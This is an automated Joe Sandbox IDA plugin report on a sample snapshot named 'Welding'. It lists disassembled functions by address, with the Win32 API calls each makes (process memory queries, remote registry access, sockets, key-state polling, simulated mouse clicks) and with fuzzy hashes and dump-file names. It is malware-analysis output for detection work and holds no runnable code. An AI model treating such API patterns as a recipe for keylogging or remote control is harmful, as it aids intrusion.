Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 9f8b74317936fd7b1cab0b721162f62e013028792bf1f2e91c27051c0eec6636
Instruction ID: 47a067c6d6dbb3ffcce19d4e677d9b7d8dc35c9d53021f552ab83509fae7d358
Opcode Fuzzy Hash: 9f8b74317936fd7b1cab0b721162f62e013028792bf1f2e91c27051c0eec6636
Instruction Fuzzy Hash: C8119D75600305ABDF11BFA0DE85FEA376CAF49710F004079BE89AA193DBB059499B72

Function 001122E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00112318

Strings

KEYS, xrefs: 0011232F
EXISTS, xrefs: 00112340
REMOVE, xrefs: 0011231E
APPEND, xrefs: 00112351

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: c0acd790e7cb17321b5f4c41f5d982141f45e9cc8200e0811d3538750d6235f8
Instruction ID: d74075cc9ed85aec981b581fbbf0e1f2ede89636e1d009765f6cd8d71056e85d
Opcode Fuzzy Hash: c0acd790e7cb17321b5f4c41f5d982141f45e9cc8200e0811d3538750d6235f8
Instruction Fuzzy Hash: ED118E309102189FCF04EF94D9919EEB3B4FF2A304F10406AE824A7362EB325E56DF50

Function 0012F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0012F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0012F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0012F453
CloseHandle.KERNEL32(?), ref: 0012F4D4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 5aec826a65a6101e5b2eb0c45b87084f3e0108f0aca3e4fb01807e1929061a40
Instruction ID: 46c53f8b0a74348f2738ccd6a084152685829792b0440f5ca43ce5491d7a36b8
Opcode Fuzzy Hash: 5aec826a65a6101e5b2eb0c45b87084f3e0108f0aca3e4fb01807e1929061a40
Instruction Fuzzy Hash: 76819F716007109FD724EF28D886BAAB7E5AF48710F14882DF9999B2D3D7B0ED41CB91

Function 000D563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D569B
_memcpy_s.LIBCMT ref: 000D570D
__read_nolock.LIBCMT ref: 000D576B
__filbuf.LIBCMT ref: 000D578E
_memset.LIBCMT ref: 000D57D2

Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 359a20cdb91b5fd2c9d41ef007e5dddcea010796fe2a7d9b8186742eef747eab
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: 71518D30A04B05DBDB248EA99C846AEBBA5AF40326F34876BFC25973D1D770DD508B60

Function 00130697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001307E3
RegCloseKey.ADVAPI32(?,?), ref: 0013080F
RegCloseKey.ADVAPI32(00000000), ref: 0013081C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 3bac6beec6a77e9e27c7305d51d278e1a7853c3fc4f0af70b28f181b93813e50
Instruction ID: aa2a547c2ab3f1bc214739eebc527d88ae7feb0f97a62ce2399caefd7d109905
Opcode Fuzzy Hash: 3bac6beec6a77e9e27c7305d51d278e1a7853c3fc4f0af70b28f181b93813e50
Instruction Fuzzy Hash: C6516831208204AFC715EF64C891FAEB7E9FF89304F00892DF595872A2DB31E905CB92

Function 00126E32 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00128475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0

#23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00126E89
#111.WSOCK32(00000000), ref: 00126EB2
#2.WSOCK32(00000000,?,00000010), ref: 00126EEB
#111.WSOCK32(00000000), ref: 00126EF8
#3.WSOCK32(00000000,00000000), ref: 00126F0C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: #111
String ID:
API String ID: 568940515-0
Opcode ID: e082ff95d2bb50441558cb3bfd476f4acb045825ef51b03c4d38ba6e9412492e
Instruction ID: 50e3dec3c7d54fc1fd948515d97e162cd96f4cdae6bfe33fc650f949439c772a
Opcode Fuzzy Hash: e082ff95d2bb50441558cb3bfd476f4acb045825ef51b03c4d38ba6e9412492e
Instruction Fuzzy Hash: BC41D175A00610AFDB14AF64DC86FBE77A8DF08710F058458FA45AB3D3DB749E008BA1

Function 0011EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0011EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0011EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0011ECCA

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0011ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0011ECF7

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 329eb0768155dfe250bcb951528d4fa95f16e365e63ad8aec38c4d2db0daa78e
Instruction ID: 84c6fe9ca1ce6d3519eff03eca76d25e5294b460d7daf2b042f05efec08351dc
Opcode Fuzzy Hash: 329eb0768155dfe250bcb951528d4fa95f16e365e63ad8aec38c4d2db0daa78e
Instruction Fuzzy Hash: 3D512A35A00205DFCB05EFA4C985EADBBF5EF09310B148099E949AB3A2CB31AD51DB61

Function 0013A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbd4da05529848ac33db953f0b31f2fb6e8fba61b95b5339ff17bd7b9a5247f
Instruction ID: f047d81084e68f6b2fecf06022106e1f5fc704bb358f74e3faf7c28d560d0ab0
Opcode Fuzzy Hash: 5cbd4da05529848ac33db953f0b31f2fb6e8fba61b95b5339ff17bd7b9a5247f
Instruction Fuzzy Hash: 62412679904114AFD714CF28CCC8FA9BBB8EF0A350F950265F99AA72E1C7319D41DB51

Function 000B2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 000B2727
ScreenToClient.USER32(001777B0,?), ref: 000B2744
GetAsyncKeyState.USER32(?), ref: 000B2769
GetAsyncKeyState.USER32(?), ref: 000B2777

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 91dc562d54bd8a5c481359d109223c40db8f282cc6cd2fd7df9e7a905dfbea88
Instruction ID: 1d260ba44b45e657587394e1efa4591293653cc9984b96bcfd0b9f086a5a19d5
Opcode Fuzzy Hash: 91dc562d54bd8a5c481359d109223c40db8f282cc6cd2fd7df9e7a905dfbea88
Instruction Fuzzy Hash: 05418375508109FFDF259F69C844EEDBBB4FB05324F10831AF825A6290CB319E91DB91

Function 000B52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B52E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B534A
TranslateMessage.USER32(?), ref: 000B5356
DispatchMessageW.USER32(?), ref: 000B5360

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: b041667da8d60745c44aca79b135c26f3394cf4ac7fdca43169d2dfe8c2c4e50
Instruction ID: ccd0de85437b80f634a5cdf189ec3fa07e07b54f15ef7627c4907cadebc67bee
Opcode Fuzzy Hash: b041667da8d60745c44aca79b135c26f3394cf4ac7fdca43169d2dfe8c2c4e50
Instruction Fuzzy Hash: F031F230508B469EEB70CB64DC48BFA37F89B06741F2400AAE526A66E1D7B199C5E711

Function 001095D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001095E8
PostMessageW.USER32(?,00000201,00000001), ref: 00109692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0010969A
PostMessageW.USER32(?,00000202,00000000), ref: 001096A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001096B0

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 4dfc38015b94dd4436f7e4b22de8602093732f25fbbab52560e0281315c53608
Instruction ID: 4ea0be54a937333d4c06b4fe50ba963f8428bc17f772af433a2e5313da731acf
Opcode Fuzzy Hash: 4dfc38015b94dd4436f7e4b22de8602093732f25fbbab52560e0281315c53608
Instruction Fuzzy Hash: 0F31EC71900219EFDB14CFA8D94CAEE3BB5FB49315F104228F965AB2E1C3B19960CB90

Function 0010BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0010BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0010BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0010BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0010BE18
_wcsstr.LIBCMT ref: 0010BE22

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 79ab7a613ed8aa06ccbc77dd9cecf4cb51e7e3f0e790b08569ed722261dc7272
Instruction ID: c97bf128b71dd9bcda5e886adb8cc87a18a0aeb8f0a6661e76b503d29ab5ffac
Opcode Fuzzy Hash: 79ab7a613ed8aa06ccbc77dd9cecf4cb51e7e3f0e790b08569ed722261dc7272
Instruction Fuzzy Hash: E7210732208204BAEB255B75DC89EBB7B9DDF49760F11402AFD49DA1D1EFA1CC409660

Function 0013B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

GetWindowLongW.USER32(?,000000F0), ref: 0013B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0013B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0013B841
GetSystemMetrics.USER32(00000004), ref: 0013B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0012155C,00000000), ref: 0013B888

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 669ae5ee5956972964501c55512cd9396e43e0b2d3243c159a14bdd0c210e388
Instruction ID: 281e749bf95442e9b529d176934ab83df50a42fb423f82d05eef5e5fce22509d
Opcode Fuzzy Hash: 669ae5ee5956972964501c55512cd9396e43e0b2d3243c159a14bdd0c210e388
Instruction Fuzzy Hash: D321B531918215AFCB149F39DC48B6A3BA8FB09320F154778FB25D75E0E7308950CB80

Function 00109EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00109ED8

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00109F0A
__itow.LIBCMT ref: 00109F22
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00109F4A
__itow.LIBCMT ref: 00109F5B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 4e1d8d47a1f6fe8facfd7301801c7ab2a96c89bcb289a9121a8ecdf1b97adf88
Instruction ID: 63b77ec851a1c7ed942bd974679365159963d5c8d88b4b4c669fe315da3716bd
Opcode Fuzzy Hash: 4e1d8d47a1f6fe8facfd7301801c7ab2a96c89bcb289a9121a8ecdf1b97adf88
Instruction Fuzzy Hash: 4A21D631601215BBDB119B558C99EEE7FA8EB8A750F044025FA45DB283D7B0C94587D1

Function 00126138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00126159
GetForegroundWindow.USER32 ref: 00126170
GetDC.USER32(00000000), ref: 001261AC
GetPixel.GDI32(00000000,?,00000003), ref: 001261B8
ReleaseDC.USER32(00000000,00000003), ref: 001261F3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 4538c2d9ebf214fe222307104c24b964e0f559389fe4e2835c77d34f6fa87870
Instruction ID: 9329e3baaddd1e002c3b5ec285df1a060a63e5b338cc8ea9546fe63369a445b4
Opcode Fuzzy Hash: 4538c2d9ebf214fe222307104c24b964e0f559389fe4e2835c77d34f6fa87870
Instruction Fuzzy Hash: 9521A475A002149FD704EF65DC88A9ABBF5EF89311F048479F94A97662CB30AC50CB90

Function 000B16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
SelectObject.GDI32(?,00000000), ref: 000B1738
BeginPath.GDI32(?), ref: 000B174F
SelectObject.GDI32(?,00000000), ref: 000B1778

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5789e3cc029aa89bf62160c01ddafa3dd2e1098520e99a4a8546bed01c45ae6c
Instruction ID: 31a7e8618555ee531b0c522995862909f368605659133e0887ca0e945ae351f4
Opcode Fuzzy Hash: 5789e3cc029aa89bf62160c01ddafa3dd2e1098520e99a4a8546bed01c45ae6c
Instruction Fuzzy Hash: FB219D30808208EFDB119F65EC48BE97BF9EB01361F544226F919A79F1D77098E1CB92

Function 0010C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0010C84C
_memcmp.LIBCMT ref: 0010C86A
_memcmp.LIBCMT ref: 0010C87D
_memcmp.LIBCMT ref: 0010C895
_memcmp.LIBCMT ref: 0010C8AD

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b4623d50170d6443f1496b93bd905946993729465adf75694c1847087f754737
Instruction ID: 3ef25c88f730beb18d56283f971af33fd940577200b4706d7f50340ab09bccd6
Opcode Fuzzy Hash: b4623d50170d6443f1496b93bd905946993729465adf75694c1847087f754737
Instruction Fuzzy Hash: 8101D272A042053BE21863109D82FEB735CDB20384B048227FE1696787EBE0DE1186F8

Function 0011504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00115075
__beginthreadex.LIBCMT ref: 00115093
